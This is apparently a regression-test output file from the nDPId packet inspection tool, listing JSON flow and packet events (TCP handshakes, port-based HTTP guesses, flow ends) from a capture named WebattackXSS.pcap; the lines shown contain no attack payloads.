+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1499347974113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347974113,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rk1AAD4GF4OsEAABwKgKModSAFAISxCIAAAAAKACchD+jAAAAgQFtAQCCAoBPL7FAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":2,"flow_last_seen":1499347974113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347974113,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh1LQi4qtCEsQiaAScSAQEwAAAgQFtAQCCAoD5pA5ATy+xQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":3,"flow_last_seen":1499347974113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347974113,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rk5AAD4GF4qsEAABwKgKModSAFAISxCJ0IuKroAQAOWvGgAAAQEICgE8vsUD5pA5"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8358,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347975371,"flow_last_seen":1499347975371,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347975371,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8358,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1499347975371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347975371,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8l4BAAD4GLlCsEAABwKgKModgAFCggleAAAAAAKACchAeFAAAAgQFtAQCCAoBPMAAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8359,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":2,"flow_last_seen":1499347975371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347975371,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh2BVDgzaoIJXgaAScSAnsAAAAgQFtAQCCAoD5pF0ATzAAAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8361,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":3,"flow_last_seen":1499347975372,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347975372,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l4FAAD4GLlesEAABwKgKModgAFCggleBVQ4M24AQAOXGtwAAAQEICgE8wAAD5pF0"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8370,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347976658,"flow_last_seen":1499347976658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347976658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8370,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1499347976658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347976658,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z4xAAD4GXkSsEAABwKgKModuAFDMdKbNAAAAAKACchChhQAAAgQFtAQCCAoBPMFBAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8371,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":2,"flow_last_seen":1499347976658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347976658,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh26qPdKAzHSmzqAScSCPCQAAAgQFtAQCCAoD5pK2ATzBQQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":3,"flow_last_seen":1499347976659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347976659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z41AAD4GXkusEAABwKgKModuAFDMdKbOqj3SgYAQAOUuEAAAAQEICgE8wUID5pK2"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347845077,"flow_last_seen":1499347850858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347845077,"flow_last_seen":1499347850858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347846345,"flow_last_seen":1499347851858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347846345,"flow_last_seen":1499347851858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347847629,"flow_last_seen":1499347852858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347847629,"flow_last_seen":1499347852858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347850209,"flow_last_seen":1499347855859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347850209,"flow_last_seen":1499347855859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347851476,"flow_last_seen":1499347856859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347851476,"flow_last_seen":1499347856859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347852742,"flow_last_seen":1499347857860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347852742,"flow_last_seen":1499347857860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347979251,"flow_last_seen":1499347979251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347979251,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1499347979251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347979251,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8naJAAD4GKC6sEAABwKgKMoeIAFCOM15oAAAAAKACchAliQAAAgQFtAQCCAoBPMPKAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8389,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":2,"flow_last_seen":1499347979251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347979251,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh4iSkzqsjjNeaaAScSDAAwAAAgQFtAQCCAoD5pU+ATzDygEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8390,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":3,"flow_last_seen":1499347979252,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347979252,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0naNAAD4GKDWsEAABwKgKMoeIAFCOM15pkpM6rYAQAOVfCwAAAQEICgE8w8oD5pU+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347980524,"flow_last_seen":1499347980524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347980524,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1499347980524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347980524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eP5AAD4GTNKsEAABwKgKMoeWAFDY8732AAAAAKACchB57gAAAgQFtAQCCAoBPMUIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":2,"flow_last_seen":1499347980524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347980524,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh5YkRgUi2PO996AScSC3AgAAAgQFtAQCCAoD5pZ8ATzFCAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":3,"flow_last_seen":1499347980525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347980525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eP9AAD4GTNmsEAABwKgKMoeWAFDY8733JEYFI4AQAOVWCgAAAQEICgE8xQgD5pZ8"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347981782,"flow_last_seen":1499347981782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347981782,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1499347981782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347981782,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XEpAAD4GaYasEAABwKgKMoekAFBFSZoIAAAAAKACchAwPwAAAgQFtAQCCAoBPMZCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8413,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":2,"flow_last_seen":1499347981782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347981782,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh6RlAFMiRUmaCaAScSDdXQAAAgQFtAQCCAoD5pe3ATzGQgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":3,"flow_last_seen":1499347981783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347981783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XEtAAD4GaY2sEAABwKgKMoekAFBFSZoJZQBTI4AQAOV8ZAAAAQEICgE8xkMD5pe3"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347983061,"flow_last_seen":1499347983061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347983061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1499347983061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347983061,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HjdAAD4Gp5msEAABwKgKMoeyAFDTp9m1AAAAAKACchBg5QAAAgQFtAQCCAoBPMeCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":2,"flow_last_seen":1499347983061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347983061,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh7KKfm1X06fZtqAScSDNEQAAAgQFtAQCCAoD5pj2ATzHggEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":3,"flow_last_seen":1499347983062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347983062,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HjhAAD4Gp6CsEAABwKgKMoeyAFDTp9m2in5tWIAQAOVsGQAAAQEICgE8x4ID5pj2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347984370,"flow_last_seen":1499347984370,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347984370,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1499347984370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347984370,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81w5AAD4G7sGsEAABwKgKMofAAFB4CR\/HAAAAAKACchB1HQAAAgQFtAQCCAoBPMjJAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":2,"flow_last_seen":1499347984370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347984370,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh8AzI3sOeAkfyKAScSAppgAAAgQFtAQCCAoD5po+ATzIyQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":3,"flow_last_seen":1499347984371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347984371,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01w9AAD4G7sisEAABwKgKMofAAFB4CR\/IMyN7D4AQAOXIrAAAAQEICgE8yMoD5po+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8445,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347985686,"flow_last_seen":1499347985686,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347985686,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8445,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1499347985686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347985686,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UVJAAD4GdH6sEAABwKgKMofOAFAxwJtBAAAAAKACchA+lAAAAgQFtAQCCAoBPMoTAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":2,"flow_last_seen":1499347985687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347985687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh84CN1TUMcCbQqAScSBI+gAAAgQFtAQCCAoD5puHATzKEwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8447,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":3,"flow_last_seen":1499347985687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347985687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UVNAAD4GdIWsEAABwKgKMofOAFAxwJtCAjdU1YAQAOXoAQAAAQEICgE8yhMD5puH"} 